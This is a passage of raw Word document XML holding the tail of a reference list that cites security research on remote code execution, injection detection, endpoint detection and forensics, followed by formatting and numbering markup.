        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, Las Vegas, NV, USA, Aug. 2022, pp. 45-62.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3140E" w14:textId="15511C30" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>] C. Campbell and M. Graeber, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Remote Code Execution: Windows Internal Mechanisms," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Symposium on Security and Privacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, San Francisco, CA, USA, May 2021, pp. 234-248.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A1EE7" w14:textId="4F47B2DD" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] L. Chen and R. Anderson, "Web Application Security: Detection Mechanisms for Injection Attacks," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IEEE Transactions on Dependable and Secure Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 19, no. 6, pp. 4123-4136, Nov. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A906FE5" w14:textId="0627A561" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] T. Rowe, "Endpoint Detection and Response: Behavioural Analysis for Threat Identification," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACM Transactions on Privacy and Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 25, no. 2, pp. 1-24, Apr. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62214DDA" w14:textId="30A2EC7D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] Microsoft Security Team, "Windows Defender ATP: Advanced Threat Protection Architecture," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Microsoft Technical Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, pp. 67-89, Jan. 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B47DBC" w14:textId="318A1949" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] H. Armstrong and J. Mitchell, "Digital Forensics in Controlled Environments: Evidence Preservation Techniques," </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>International Journal of Digital Evidence</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, vol. 12, no. 1, pp. 45-67, Spring 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A504A" w14:textId="77777777" w:rsidR="00527136" w:rsidRPr="00A000BA" w:rsidRDefault="00527136" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00527136" w:rsidRPr="00A000BA" w:rsidSect="00053404">
      <w:footerReference w:type="default" r:id="rId40"/>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01FB10" w14:textId="77777777" w:rsidR="009042DB" w:rsidRDefault="009042DB" w:rsidP="00115C04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4643A3C1" w14:textId="77777777" w:rsidR="009042DB" w:rsidRDefault="009042DB" w:rsidP="00115C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Lucida Sans Unicode">
    <w:altName w:val="Lucida Sans Unicode"/>
    <w:panose1 w:val="020B0602030504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000AFF" w:usb1="0000396B" w:usb2="00000000" w:usb3="00000000" w:csb0="000000B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46531160"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="79678CB5" w14:textId="1FD6B113" w:rsidR="00053404" w:rsidRDefault="0005340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EE12FC6" w14:textId="075595FC" w:rsidR="00115C04" w:rsidRDefault="00115C04">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:ind w:left="0"/>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6AF0A6" w14:textId="77777777" w:rsidR="009042DB" w:rsidRDefault="009042DB" w:rsidP="00115C04">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2898C387" w14:textId="77777777" w:rsidR="009042DB" w:rsidRDefault="009042DB" w:rsidP="00115C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791C9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63785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E02643"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02DE69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6E19A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DC229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C25BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="066216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E7647A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCA81D02"/>
    <w:lvl w:ilvl="0" w:tplc="9650F6CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="12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AFE1048"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26BC5D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3877F6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADD2F6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5C51697"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80CC84B0"/>
    <w:lvl w:ilvl="0" w:tplc="F7284DDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="311"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="93"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CB4E13C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1303" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3B36DEF2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2166" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ACD88270">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3029" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="86469A26">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3892" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="16B6C3A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="60982266">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5618" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="147E8456">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6482" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="51DE05CC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7345" w:hanging="311"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AC420ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B330CB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4011DD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40243B08"/>
    <w:lvl w:ilvl="0" w:tplc="EBA6D044">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="507" w:hanging="485"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="113"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="59E40724">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="521" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="78"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4B906398">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1470" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3CF02E40">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2420" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="99FA9E7C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3370" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6E60DD10">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="69B47548">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5270" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EB5CA936">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6221" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2ACC4F00">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7171" w:hanging="200"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45767808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="532C3674"/>
    <w:lvl w:ilvl="0" w:tplc="48541F0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="321" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="113"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AD5883C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1195" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="10225D56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2070" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="30020C1A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2945" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A1BAD182">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3820" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E554640E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4695" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D04A5792">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5570" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D37270CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6446" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="935E0A9A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7321" w:hanging="299"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47B10724"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="497CA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9451C19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F3C73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FA51FEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D24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ED26B64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36E443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1873984"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56F462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5DF60E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197E7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AFE54FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE160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1FA6270"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F3AB2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C1D3F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCDCDD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96384040">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="145123357">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="151871913">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1581792387">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1766804661">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1818448993">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1947880598">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="531190802">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="561913204">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="929659466">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="93326373">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="459567879">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="78716747">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1586188017">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1858275627">
    <w:abstractNumId w:val="18"/>
  </w:num>
